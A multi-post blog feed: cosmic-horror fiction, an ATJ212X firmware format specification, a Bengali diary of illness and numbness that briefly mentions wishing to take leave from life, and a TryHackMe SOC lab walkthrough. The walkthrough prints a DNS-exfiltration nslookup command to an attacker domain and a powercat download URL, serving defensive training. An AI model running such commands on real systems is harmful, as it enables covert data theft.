Under no circumstances should any living thing deign to enter Ur itself. It's driving nuclear engine would rip apart anyone or anything foolish enough to slip under its surface faster than the speed of light.

It is said that certain creatures, those acquainted with chaos, know ways to traverse the waters safely, but they are known to traffic in lies and half-truths. To put your faith in anything they offer in regards to Ur is more suicidal than simply foolish.

Why would anyone seek out such a place?

Change is seductive, to be someone else, to be better.

Perhaps you are terminally ill.

Perhaps you are hopeless.

Perhaps you are stuck, broken, lonely, inadequate, afraid, incomplete.

Would you be willing to throw your life into a blender and pray you retain your “self” in the recombination?

Would you be so unsatisfied with your current life that you are willing to risk complete dissolution?

Or perhaps.

Perhaps.

You prefer to be undone.

There are those who have been so traumatized by the act of living in the world as it is that they wish to escape into emptiness and leave nothing behind. They do not care for legacies. They do not see “the future” as anything but a continual slide into pain, isolation, and loneliness. They see the truth: entropy is inevitable.

But instead of seeking strength or fellowship, they choose to forget and to be forgotten.

What they do not understand is that Ur is rebirth. They will cease, but every bit of everything that made them who they were will be repurposed and reused to make another or billions of others stretched and threaded until unrecognizable.

True endings are only available from embracing Oblivion, from the orthogonal path back to the beginning, back to the ending. Only there can everything be truly nothing, forever and ever.

Nessianna Inmenna operates out of Ur. To her, the radioactive waters are like a warm bath, a comfort.

Elysium / Nirvana

Imagine a party that never ends spanning worlds filled with abundant life. That is Elysium, also called Nirvana.
A “party” is something with a different definition for each culture. For some it is a celebration of excess. For others, it may be an acknowledgement that you finally understand that you have no desires at all. For both, it is a place without responsibilities.

Elysium is a paradise of wanting and needing nothing, whether this is because everything is provided that you could possibly want or a place of emptiness because all worldly concerns have vanished, you will find it here and you will be at peace.

Epicurea

Epicurea is another world of plenty, but it does not give those who visit anything for free. You must work to find what you desire, but it is here. It is always here and you may find it if you pass the tests, survive the gauntlets, answer the riddles. It is a plane of growth and perseverance.

Unlike Elysium, here, you can fail. You may not solve the puzzles on the first try. You may not find your way through the maze. But you can try again.

Hell

Hell is not a place intended for punishment, not directly. Hell is a place for refinement and growth. Some who find themselves here may never realize that and they may be “tortured” for eternity. Others may thrive, find themselves, rarified, and leave freely as something greater than what arrived.

Hell is not a single place or a single experience. It is something that builds itself around the expectations of its inhabitants. Many may share the same Hell or Hells, but that is a quirk of organized religion planting the same set of expectations in the minds of billions.

Nuntius

Nuntius is a realm of secrets, of knowledge, of every book that could ever be written. It is also a plane full of lies and deception so the traveler must be cautious and careful.

One can find the Akashic Record here, but there is no helpful librarian, no card catalog or directory, and any one book is just as likely to be a fake as to be genuine. Additionally, a single wrong step and you may find yourself in the The Library of Babel instead and that path is guaranteed madness.

Vitrium

Imagine a world where every tree, every insect, every blade of grass, every gust of air is broadcasting every detail of itself to every other thing, all the time. It is a world of perfect, unfiltered information; a place where there are no secrets.

To visit Vitrium is to be laid bare to yourself and everyone else. There are no shadow selves here, no lies or deception, only Truth.

For a human mind, the raw experience of such a place is a meaningless cacophony, too wide, too deep, too bright, too loud. It is impossible to process.

Acceptance / Obsequium

Obedience, Submission, Compliance, Resignation

Concerned with how

Science, Religion, Rules, anything with codified and definitive answers, anything that replaces warm hope with cold truth.

Passive while appearing Active.

Insight / Consilium

Insight, Discernment, Understanding

Concerned with why

Introspection, Mindfulness, experience over explanation, seeing and being over knowing.

Active while appearing Passive.

Addendum 1: Oblivion

The Blight

Singularity

Nowhere

Nowhen

Absolute Zero

Before existence, there was Oblivion. Eternal because time had not yet ticked its first. Limitless because space had not yet been borne. It was nothing and everything. Potential without ignition, less than the sum of its parts. It is absolute entropy and the state to which every universe seeks to return.

Naralmtu serve The Blight.

Absolute Zero

https://en.wikipedia.org/wiki/Absolute_zero Absolute zero is the lowest possible temperature, a state at which a system's internal energy, and in ideal cases entropy, reach their minimum values. The Kelvin scale is defined so that absolute zero is 0 K, equivalent to −273.15 °C on the Celsius scale,[1][2] and −459.67 °F on the Fahrenheit scale.[3] The Kelvin and Rankine temperature scales set their zero points at absolute zero by design. This limit can be estimated by extrapolating the ideal gas law to the temperature at which the volume or pressure of a classical gas becomes zero.

At absolute zero, there is no thermal motion. However, due to quantum effects, the particles still exhibit minimal motion mandated by the Heisenberg uncertainty principle and, for a system of fermions, the Pauli exclusion principle. Even if absolute zero could be achieved, this residual quantum motion would persist.

Although absolute zero can be approached, it cannot be reached. Some isentropic processes, such as adiabatic expansion, can lower the system's temperature without relying on a colder medium. Nevertheless, the third law of thermodynamics implies that no physical process can reach absolute zero in a finite number of steps. As a system nears this limit, further reductions in temperature become increasingly difficult, regardless of the cooling method used. In the 21st century, scientists have achieved temperatures below 100 picokelvin (pK). At low temperatures, matter displays exotic quantum phenomena such as superconductivity, superfluidity, and Bose–Einstein condensation.

Addendum 2: Rapture

The Bloom

The Song

Ecstasy

Exultation

Ubiquity

Omnilarity

Everywhere

Everywhen

Quantum Foam

Everything that can exist, does exist here. Everything that cannot exist, exists here. Everything that was and was not, what will be and will not be, exists here. This is all things, all times, all places, all thoughts, all possibilities and impossibilities.

This is the first moment, before any rules have been established, before up is up and down is down.

Ohmadrundi (a subset of machine elves) serve The Bloom.

IMAGE MISSING

Absolute Hot (Planck Temperature)

[[What Is The Hottest Temperature in The Known Universe, And Could We Achieve It]] https://www.straightdope.com/21341968/what-is-the-opposite-of-absolute-zero There is a limit, sort of, but it’s so inconceivably large that nobody but high energy physicists talks about it (although as I think about it absolute zero doesn’t exactly qualify as breakfast table chatter either). The highest possible temperature, called the Planck temperature, is equal to 1032 degrees Kelvin. For comparison, the center of the sun bubbles along at 15 million K (15 x 106); silicon can be created by fusion at 1 billion K (109). In short, the Planck temperature is very toasty indeed.

Some scientists believe that we, or at least our universe, have already experienced the Planck temperature, although it went by so quickly you may have missed it. It occurred at 10 -43 of a second after the Big Bang, the great cataclysm in which the universe was born. (10 -43 of a second, in case you’re not hip to the notation, is an incredibly tiny fraction of time. Time enough to create the universe, but not, as a University of Chicago physicist was once at pains to explain, time enough to get off a disputed last-tenth-of-a-second shot against the Chicago Bulls.)

Absolute zero is easier to understand than the Planck temperature. What we perceive as heat is a function of motion. The colder something gets, the less internal motion or vibration its molecules exhibit. At absolute zero — that is, zero Kelvin or -460° Fahrenheit — molecular motion virtually stops. At that point whatever the molecules are a part of is as cold as it’s going to get.

There’s a lot more latitude in the opposite direction. The faster molecules move, the hotter they get. At 1010 K electrons approach the speed of light, but they also become more massive, so their temperature can continue to rise. At 1032 K such staggering densities obtain that greater temperature would cause each particle of matter to become its own black hole, and the usual understanding of space and time would collapse. Ergo, the Planck temperature is as hot as things can get. Or at least it’s the highest temp conceivable in present theory. There’s a chance when a quantum theory of gravity is worked out we may find even higher temperatures are possible. The prospect, frankly, leaves me cold.

Addendum 3: The Mirror Realm

Also called “Ouroboros”

Chirality is not a word you are likely to hear in every day conversation, but it is at the heart of the final place we must consider: The Mirror Realm.

To understand the idea simply, look at your hands. Despite the fact that they seem functionally identical at first glance, there is no direction or method by which your left hand could be held or manipulated into being your right hand.

This feature of our reality is called “chirality” – there are structures that cannot be reshaped into their mirror images without destroying them or fundamentally changing their function.

This “handedness” goes deeper than our hands and into our DNA, the food we eat, the forces and fields that bind our base elements together and allow us to exist as complex, thinking biological systems and further extends into the other places written above.

There is a preferred direction in which we all twist that cannot be undone. Our multiverse is incompatible with the idea. To whit, “mirror” proteins cannot nourish us and “mirror” energies would be vastly different in how they functioned and may not function at all.

And yet, we see into a world that flips the direction effortlessly every time we see our own reflection in a mirror.

Mirrors offer us a window into another reality which resembles ours but where the rules are very different. As I said, we can easily project an image of ourselves into this version of reality, but could we truly step into it?

Before answering that, let us discuss the art of scrying, divining by looking into something akin to a black mirror or, rather, looking beneath the surface of the black mirror. Why would scrying produce tangible results? Why would peering into a reflection of our own world provide any insight into our own?

I have already mentioned that the laws are different in that place, but you must also consider how freely we reflect. Every drop of water and snowflake, every pane of glass, every polished boot, every silver earring, every chrome pipe, every phone screen and television, every set of mirrors attached to automobiles, produce reflections. Our entire world is reflected into this mirror realm. It is impossible to not reflect ourselves multiple time a day.

To scry is to peer sideways into the mirror realm and find insight. It is too look beyond your own reflection, to ignore it and see what lies behind it and beneath it. The scryer finds our own reality broken into pieces, fragmented, seen from a thousand different angles, atomized and rarefied down to essentials. The wise mind understands how to combine these snippets into a clearer picture of the whole than if they had seen it firsthand. This direction, seeing the back of reality, the mirror, gives them insight which can be translated back into truths valid in our own reality.

If such power can be had by simply looking how much greater would it be to walk within?

As I have said, chirality means the essence of our reality is not compatible with the mirror realm. There is life there, of a kind, but not life we would recognize. Monstrous life that only moves when we aren’t looking because our perception of it from our side of the glass renders it invisible and freezes it in time. Stare at a mirror in the dark long enough and you will start to see evidence of them in the way your own reflection morphs into something unrecognizable. But they cannot hurt us and we cannot harm them. We are simply incompatible.

However, if someone were step through the mirror, into the mirror realm itself, then we become briefly tethered to their reality. For a short time, we can breathe the air, we can walk along the surfaces, we can hear and see. All the while, our flesh is fighting an invisible battle against molecules that are not designed for us. A buzzing in the ears, a bloody nose, blurry vision, hallucinations, nausea.

And the things that live there are slowly but surely no longer bound by our perception. They turn their multifaceted eye stalks and twitch with unexpected motion, able to watch and plan.

How do you think an intelligent creature would feel about finally being able to confront one of those hateful things whose very gaze once paralyzed them?

Mirror Walkers claim that time does not pass for them on the other side of the glass. They will tell you that they cross incalculable distances in fractions of a second and that there is no living thing on the other side that can catch them because of the speed with which they traverse the place.

It is up to you whether or not you wish to believe them.

Addendum 4: The In Between

The In Between is a strange corollary to The Mirror Realm, a place visited by few and often whispered of as if little more than a fairy tale.

In stories, it is a stale, stagnant place outside of time yet between spaces. One could stay here forever and never age a day. The only cost being ambition and drive.

At the edges, a visitor can see out but cannot be seen, making it an ideal method of clandestine information gathering.

Why would this place be considered a sibling to The Mirror Realm?

The most common way to enter The In Between is to step inside a wall.

Addendum 5: The Fae

They exist. They flit between layers of reality as easily as turning a page in a book. But where are they from? Where do they live?

I can only speculate. Even the shadows merely cough and gasp in what passes for their laughter when I ask, refusing to give an answer.

Perhaps the answer lies in other liminal, transitional places such as The Fugue or The In Between. Perhaps the answer is in yet another nameless direction in which I will have to learn to peer. That would at least explain why they are so unpredictable: they operate under a different set of rules, entirely.


#Psychomancer #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #ParanormalFiction

 
Read more...

from Psychomancer

The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.

But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.

We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies—built of atoms and molecules—cannot go. These worlds are just as real, just as vibrant.

And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even “project” something of themselves down to our level as emissaries or explorers such as many-named Nyarlet'hotep and its lesser-known siblings NAM, NUM, and IM.

But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need not obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can't even truly look at them because, to us, those angles, do not exist.

We call them gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.

Is it any wonder that imps, gremlins, fae, demons, all the so-called “lesser” outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or mock us? Who can say? Their minds and motives are just as alien.

So who did I meet that unusually warm Saturday night?

I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.

Not my front door, nor my back door.

It came from my basement door.

If I were a cat, my hackles would be raised. Instead, a sort of panic hit, wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.

I have no guns no serious weapons save a ceremonial sword mounted much too far out of reach.

I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.

I can't recall seeing his eyes.

“Excellent!” he said in a thick British accent stolen from Austin Powers.

“This is one where you listen.”

“Are you doing a bit?” I grasped, looking past him for a cameraman or some hint that this was a misguided joke.

“A bit?” He rubbed his chin with his right hand. “I don't think so.”

He offered his left hand.

“Archibald Horatio Pierse, IV,” he said, overly emphasizing The Fourth as if it was of great importance. “Pierse with an 's',” concluded his introduction.

He was still shaking my hand, which I didn't remember offering in return.

“Sometimes,” he said. “I like to pop in and give a bloke or bird whose almost got it a little glimpse of the whole.”

'bloke or bird,' I thought. This has to be a bit.

“Right,” he said, no longer shaking my left hand, but still holding it.

The world fractured, splintered. Every cell pulled in a different direction.

Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.

We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.

We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.

There is no pattern, no spider's web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.

When we dream, we are free to reach into the other us-es and become them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.

Gender, race, nationality, species, moral character, upbringing: I am every possibility.

I am every drop in the ocean and the ocean itself.

I am the sky, the moon, the stars, a worm, a bacteria, a lichen.

The one who showed me—I had forgotten he existed—he bade me, “turn around.”

What a strange request! I am all that is and was. Do I not already “see” in every direction?

“Turn around.”

A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a new direction.

Syzygy.

I am All, yet All That is Not Me is also All.

I see the tapestry, the enmeshed pattern.

The beauty.

The belonging.

The Love.

Every part of me weeps.

An infinity of infinities.

Each unique.

Together, whole.

Like curtains dancing in the breeze.

Like a rainstorm.

Like staring at the sun.

Like the song of cicadas.

Unity.

From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…

All is One and One is All.

Then I'm lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.

And I can't stop crying.


I think I will stretch you sideways.
I think I shall stretch you sideways.
Why don't I show you what sideways looks like?
How about sideways?
What about sideways"?
I'd like to show your sideways.

I thinkdon't I willshall I showstretchsideways youwhatsideways looks like.

#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal

 
Read more...

from Tom Tildavaan

Regardless of what's your take on Apple, they do make products that are beautiful. Beauty in design, beauty in simplicity. As I am typing this on my Macbook, I see crisp fonts, I see gorgeous icons.

Now, mass-produced gadgets from China usually lack that design fine-tuning even when the hardware is amazing.

Starting from serif fonts which make your 24-bit FLAC-playing DAP look like it is a typewriter from 90s, to the hodgepodge of icons and backgrounds.

Usually these devices do not support customer theming, but we are going to change this a bit with Waterjet.

In the coming months we will be releasing docs and tools allowing decrypting, unpacking, updating, and re-packing firmware resources for devices running on Actions Semiconductor ATJ212X, ATJ215X, and others that use μC/OS-based SDK, allowing everytone to personalize their devices without the need for SDK from Actions.

And to the vendors who ship these devices — you will have a better customer experience if you run the fonts and designs past a designer, then we would not need to do all this.

And to start us up, here's the format of FWIMAGE.FW for ATJ212X devices.

Actions Semiconductor FWIMAGE.FW Specification

1. File Structure

The firmware image is a sector-based container (512 bytes per sector) with a fixed-size header area of 16 sectors (8192 bytes).

Section Size Description
Global Header 512 bytes Basic metadata (Magic, VID/PID, Ver)
LDIR Table 240 * 32 bytes Fixed-size Logical Directory entries for all files
Component Data Variable Raw binary data for drivers, APs, and STY files

2. Global Header (Sector 0)

The first 512 bytes contain the system metadata.

Offset Size Description
0x00 4 Magic: 0x0FF0AA55
0x04 4 SDK Version (ASCII)
0x08 4 Firmware Version (ASCII)
0x0C 2 Vendor ID (VID)
0x0E 2 Product ID (PID)
0x10 4 LDIR Checksum (Stride 4)
0x50 48 USB Setup Info (ASCII)
0x80 336 SDK Description (ASCII)
0x1FA 4 R3 Config Sector Offset (Pointer to DEVINFO.BIN)
0x1FE 2 Global Header Checksum (Sum of first 510 bytes)

3. Logical Directory (LDIR) Table

Starting at offset 0x200 (Sector 1) and ending at 0x2000 (Sector 16). This is a static table of exactly 240 entries. Unused entries are null-padded.

Offset Size Description
0x00 8 Filename (8.3 format, space padded)
0x08 3 Extension (ASCII)
0x0B 5 Padding
0x10 4 Sector Offset: Start position in sectors (absolute position = offset * 512)
0x14 4 File Size: Size in bytes
0x18 4 Reserved
0x1C 4 File Checksum (Stride 4 sums)

4. Checksums

Global Header Checksum

The last two bytes of the Sector 0 header (offset 0x1FE) contain a 16-bit checksum of the first 510 bytes using a 2-byte stride.

uint16_t calculate_header_checksum(const uint8_t *data, size_t len) {
    uint16_t sum = 0;
    for (size_t i = 0; i < len; i += 2) {
        uint16_t val = (uint16_t)data[i] | ((uint16_t)data[i+1] << 8);
        sum += val;
    }
    return sum;
}

LDIR & File Checksum Algorithm (Stride 4)

Accumulates 32-bit words interpretated as little-endian. The sum naturally wraps at 32 bits.

#include <stdint.h>
#include <stddef.h>

/**
 * Calculates the Actions Stride-4 checksum.
 * @param data Pointer to the buffer (must be 4-byte aligned for some platforms)
 * @param len  Length of data in bytes (should be multiple of 4)
 * @return 32-bit unsigned checksum
 */
uint32_t calculate_checksum_s4(const uint8_t *data, size_t len) {
    uint32_t sum = 0;
    for (size_t i = 0; i < len; i += 4) {
        uint32_t val = (uint32_t)data[i] |
                       ((uint32_t)data[i+1] << 8) |
                       ((uint32_t)data[i+2] << 16) |
                       ((uint32_t)data[i+3] << 24);
        sum += val;
    }
    return sum;
}

Sector Alignment

Every file within the image must start on a 512-byte boundary. When packing, files must be padded with null bytes to reach the next sector.

Boot Sequence

The firmware expects KERNEL.DRV and CONFIG.BIN to be present at specific LDIR indices or offsets defined by bootloader. Just put them at the same location as where you took them.


Interested in the format of ATJ215X firmware? It is an encrypted sqlite3 database. And encryption has already been reverse-engineered — see rockbox sources for atjboottool.

 
Read more...

from লোকমানুষ এর ব্লগ

the-moon-and-blue-red-cloud-fusion

মৌসুমী ভৌমিকের গানটা আজ হঠাৎ মনে পড়ে গেল- “কেন শুধু শুধু ছুটে চলা, একে একে কথা বলা, নিজের জন্য বাঁচা নিজেকে নিয়ে..”। গানটা কেমন যেন আজকের দিনগুলোর মুখপাত্র হয়ে উঠেছে। শব্দগুলো শুধু সুর নয়, এখন আমার নিঃশ্বাসের অনুষঙ্গ।

দিনগুলি এখন হিসাবের বাইরে, বিচ্ছিন্ন পাথরের মতো যার যার মত ছড়িয়ে পড়ে আছে। গতকালের সকাল আর আজকের বিকালের মধ্যে কোনো সীমানা খুঁজে পাই না। দুই দিনকে আলাদা করার জন্য নতুন কোনো শব্দ নেই অভিধানে। প্রতিদিন একই জানালা, একই আলোছায়া, একই ঘড়ির কাঁটার দৌড়। বিরক্তির ভাঁজ কপালে জমে, কিন্তু পরক্ষণেই মনে হয়- এইটুকুই বা কম কী? সময় তো আরো ভাঙচুর করতে পারত, তবু কিছুটা শৃঙ্খলা এখনো টিকে আছে।

গত কয়েকদিন ধরে শরীর বিদ্রোহ করে চলেছে। একদিন তো জ্বর এসে সময়ের হিসাবই লোপাট করে দিল। চোখ মেললাম- সকাল, আবার মেললাম- দুপুর, আরেকবার- দেখলাম সন্ধ্যা ইতোমধ্যে বিদায় জানাচ্ছে। জ্বর যদিও সেরে গেছে, কিন্তু ছেড়ে গেছে গলা-ব্যথা আর তার নিষ্ঠুর সঙ্গী মাথা-ব্যথাকে। সঙ্গে সঙ্গ দেয়ার জন্যে রয়ে গেছে মৃদু কাশি- অতি পরিচিত শত্রু। কাশির স্মৃতি আমার জন্য সাবান পানিতে ভেজা চামড়ার মতো, পুরোনো এক অসুখের ছায়া মনে ভর করে। কখনো কখনো শরীর মনে করিয়ে দেয়, স্মৃতি শুধু মনের নয়, দেহের কোষেও লেখা থাকে।

আগে যা ভালো লাগত, এখন তা ধূসর মনে হয়। বইপত্র, গান, মুভি -সব যেন পানিতে ভেজা ধূসর কাগজের মতো নিষ্প্রাণ। সবচেয়ে বিস্ময়কর ব্যাপার হলো- শিশুদের দেখলে আগে যে হৃদয় গলে যেত, এখন সেখানে কোনো না কোনো জায়গায় একটি বিরক্তি দাঁড়িয়ে থাকে। মনে হয়, ওদের কোলাহল থেকে দূরে থাকি, নিঃশব্দে থাকি। এই পরিবর্তনটাই বেশি ভয়ংকর -আগে যা জীবনকে স্পর্শ করত, আজ তা থেকে নিজেকে গুটিয়ে নেওয়ার প্রবণতায় পরিণত হয়েছে।

ছুটি! শব্দটা এখন প্রার্থনার সমার্থক। কিন্তু, এ ছুটি কেবল দৈনন্দিন রুটিন থেকে নয়, এ ছুটি এই অভ্যন্তরীণ নীরবতা থেকে, এই আবেগহীন প্রবাহ থেকে। কখনো কখনো জীবন থেকেই ছুটি নেওয়ার ইচ্ছে জাগে, একটা দীর্ঘ, শান্ত নিদ্রার মতো। কিন্তু জীবনের প্রতি এক গভীর অনুক্ত মায়া, এখনো রয়ে গেছে। যেমন- একটা পুরোনো বাড়ি, যার দরজা-জানালা ভাঙছে, কিন্তু যার প্রতিটি ধূলিকণায় স্মৃতি লেগে আছে। তাই মায়াটাও এখনো রয়ে গেছে।

জীবন কালের এই বয়সে দাঁড়িয়ে উপলব্ধি হয় যে, জীবন একইসাথে ‘বোঝা’ ও ‘বরাদ্দ’। অনেকটা পাহাড়ের মাঝপথে উঠে পেছনে ফিরে তাকানোর মতো। নিচের পথটুকু পেরিয়েছি, কিন্তু শীর্ষ ছোঁয়া এখনও বহুদূর। আর শরীরে জমা হয়েছে ক্লান্তি। তবুও এগোতে হচ্ছে, কারণ নিচে নামার পথটা অসম্ভব দুর্গম।

আজকের এই এলোমেলো ভাবনা গুলো ডায়েরির পাতায় লিখে রাখলাম; হয়তো এই শূন্যতা পূর্ণতারই আরেক রূপ। সময় হয়তো হৃদয়কে শূন্য করে তুলছে পরবর্তী কোনো গভীর অনুভবের জন্য জায়গা তৈরি করতে। জ্বর সেরে যাওয়ার পর শরীর যেমন একটু বেশি সংবেদনশীল হয়, তেমনই হয়তো এই আত্মিক স্তব্ধতার পর কিছু দেখা বা বোঝার সূক্ষ্ম ক্ষমতা ফিরে আসবে।

আজ শুধু এই কথাগুলোই লিখে রাখি, যেন এই মুহূর্তের ভার্চুয়াল সাক্ষী থাকে এই শব্দগুলো। হয়তো কোনো এক ভবিষ্যৎ দিনে ফিরে দেখব, এই শব্দগুলো পড়ব, আর তখন বোঝার চেষ্টা করব- যে ব্যক্তি এগুলো লিখেছিল, সে আসলে হারিয়ে যাচ্ছিল নাকি নতুন কোনো উপকূলের খোঁজ পেয়েছিল।

জানালার বাইরে এখন রাত। দূরে কোনো বাড়ির জানালায় একটি বাতি জ্বলে আছে, এক টুকরো মানবিক উষ্ণতা। হয়তো জীবন আসলে এটাই- একটা অন্ধকারে জ্বলা বাতি খোঁজা, যে বাতি হয়তো অন্যের বারান্দায়, কিন্তু তার আলো আমাদের জানালাতেও পড়ে। আজকের মতো এটুকুই যথেষ্ট। আজ শুধু থাকব, আর শ্বাস নেব। এই অস্থির হৃদয় নিয়েই, এই অসুস্থ শরীর নিয়েই, এই স্তব্ধ সময় ধরেই।

⠀⠀

⠀⠀

হয়তো, নিজেকে নিয়ে বেঁচে থাকার অর্থই হলো- এই ভাঙাচোরা মুহূর্তগুলোকেও আস্তে আস্তে, একটু একটু করে, স্পর্শ করে যাওয়া…

⠀⠀

⠀⠀

⠀⠀

 
Read more...

from plutogazer writeups

This is a guide to get a 100% True Positive rate for the Phishing Unfolding SOC Simulator TryHackMe challenge room. Because this is just a walkthrough, I will be avoid writing complete reports, and just write the though process behind the verdict instead.

Introduction and Considerations

The description of the room is the following:

Dive into the heat of a live phishing attack as it unfolds within the corporate network. In this high-pressure scenario, your role is to meticulously analyse and document each phase of the breach as it happens.

Can you piece together the attack chain in real-time and prepare a comprehensive report on the malicious activities?

In this SOC Simulator room we will be using Splunk to analyze alerts and try to identify potential phishing attacks. This room contains 36 alerts that start appearing after a short period of time. Alerts will be appearing on the built-in SIEM the SOC Simulator tool has. This tool provides a case management functionality, in which we will write the reports for each alert. Once analyzed, we need to determine whether the alerts was a True Positive or False Positive, and whether it requires escalation to a superior or not. The Simulator also provides a VM with an integrated Threat Intelligence Platform called TryDetectThis. Because alerts will still be coming while we are analyzing a previous one, at some point we will have pages worth of “Unassigned” alerts. Prioritize alerts the SIEM has identified with higher severity, and with oldest timestamps.

Many alerts can be related to other alerts, or are just False Positives. This writeup will only cover the True Positive alerts, and only the first on the chain of a sequence of alerts when applicable (I still had to analyze nearly all of them, because you never know!). The room also offers a “Documentation” tab, containing a “Company Information” tab, providing information on the employees of the fictional company. This tab will be useful during alert triage and for providing exhaustive information regarding affected entities when reporting.

Grading

The SOC Simulator, technically speaking, only cares for alerts the user has identified as True Positives. Once all True Positives have been identified as such, the simulation ends even if there still are alerts in queue. Furthermore, the written reports are “graded” by an LLM. The tool recommends using the following format for reporting: Time of activity: List of Affected Entities: Reason for Classifying as True Positive: Reason for Escalating the Alert: Recommended Remediation Actions: List of Attack Indicators:

However, what the LLM seems to actually be looking for is the 5 Ws of Alert Triage. Even so, it sometimes fails to understand certain aspects of the human language, and reduces points unfairly. This is why I will not post complete reports here, just the thought process behind the verdict. As a rule of thumb, to get the maximum amount of points possible and reduce the LLM margin of error, we should write all relevant timestamps, all possible information about the victims and other entities (from the Company Information section), information about related events before and after the alert, reasons for escalation (or not), and when possible, point out attack artifacts and MITRE mapping. And, as always, try to identify the 5 Ws in your report.

Alert 1: Suspicious email from external domain (ID 1000) – Low severity

The information the SIEM gives us is (some output omitted):

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

sender:
eileen@trendymillineryco.me

recipient:
support@tryhatme.com

attachment:
None

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

content:
A long lost billionaire relative has left you their secret hat empire To claim your inheritance send us your banking details immediately

This is a classical Phishing technique. It promises something extremely valuable in exchange for confidential information. This is why we classify this as True Positive. The MITRE ATT&CK ID for Phishing is T1566. Let's check the log management tool (in my case, I chose Splunk) and search with the “eileen” email as a recipient, just to see if support actually sent their banking details. The search returned no results, so it seems the user did not comply. As such, there is no need for escalation.

Alert 2: Suspicious email from external domain (ID 1003) – Low severity

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

timestamp
01/26/2026 21:15:30.473

subject:
Grow Your Hat Business Overnight with this Secret Formula

sender:
leonard@fashionindustrytrends.xyz

recipient:
yani.zubair@tryhatme.com

attachment:
None

content:
Unlock the ultimate strategy to skyrocket your hat empire No experience needed Just click and watch the profits roll in

At 01/26/2026 21:16:44.240 spam was received by yani.zubair@tryhatme[.]com, which belongs to Yani Zubair, from IT, using hostname win-3449. The email was from leonard@fashionindustrytrends[.]xyz. This email used common Phishing strategies (MITRE ATT&CK ID T1566) such as offering compensation by entering a page and clicking something. Further actions from Yani Zubair's hostname after the email was received were analyzed, but the Splunk logs showed no evident malicious events. It seems the user has ignored the email message. Due to this, it is a True Positive, but no escalation is required.

Alert 3: Suspicious Parent Child Relationship (ID 1025) – High severity

Description:
A suspicious process with an uncommon parent-child relationship was detected in your environment.

timestamp:
01/26/2026 21:45:42.473

host.name:
win-3450

process.name:
nslookup.exe

process.pid:
5520

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\nslookup.exe" UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io

process.working_directory:
C:\Users\michael.ascot\downloads\exfiltration\

event.action:
Process Create (rule: ProcessCreate)

This alert had a HIGH SEVERITY, and there is no wonder why... what exactly happened? Let's take a look at the information the SIEM is giving us. It seems that hostname win-3450 is using the powershell from a directory called “exfiltration” to perform a nslookup of a domain with a subdomain of what looks like encoded data. This is obviously data being exfiltrated. Let's see what we can find from the logs. But first, let's check who win-3450 is. From the Company Information tab, we find out that the win-3450 device is being used by Michael Ascot, whose email address is michael.ascot@tryhatme[.]com, and is the CEO of the company. Anyway, this alert seemed to come out of nowhere. We got a timestamp and we got the device that is creating these processes. Let's check events happening at this hostname a few minutes before an after the alert.

Splunk shows us a long list of problematic events right after this one. There are multiple registry modifications and other processes creations, including downloading external resources from the powershell (such as hxxps[://]raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat[.]ps1), even more lookups to different (encoded) subdomains of haz4rdw4re.io, and performing command such as systeminfo or whoami. This is absolutely not common or expected behavior from any host. Data is clearly being exfiltrated by using DNS queries, and it is done this way because DNS is a very common protocol to see flowing through networks and, therefore, less monitored. It helps to avoid detection or filtering. The encoded subdomains are actually the data that is being exfiltrated, but encoded. Commands such as systeminfo or whoami are commonly used during Post-Exploitation, as these give the attacker information on the current user's privileges and machine (MITRE ATT&CK ID T1033). Now we have confirmed that this is a True Positive, but we still don't know how it happened. Looking at earlier timestamps, we find that right before all this sequence of events happened, a file named “ImportantInvoice-Febrary.zip” was created at the /downloads directory, which later created the /exfiltration subdirectory. We have no information regarding where this file came from. Let's search for it on Splunk.

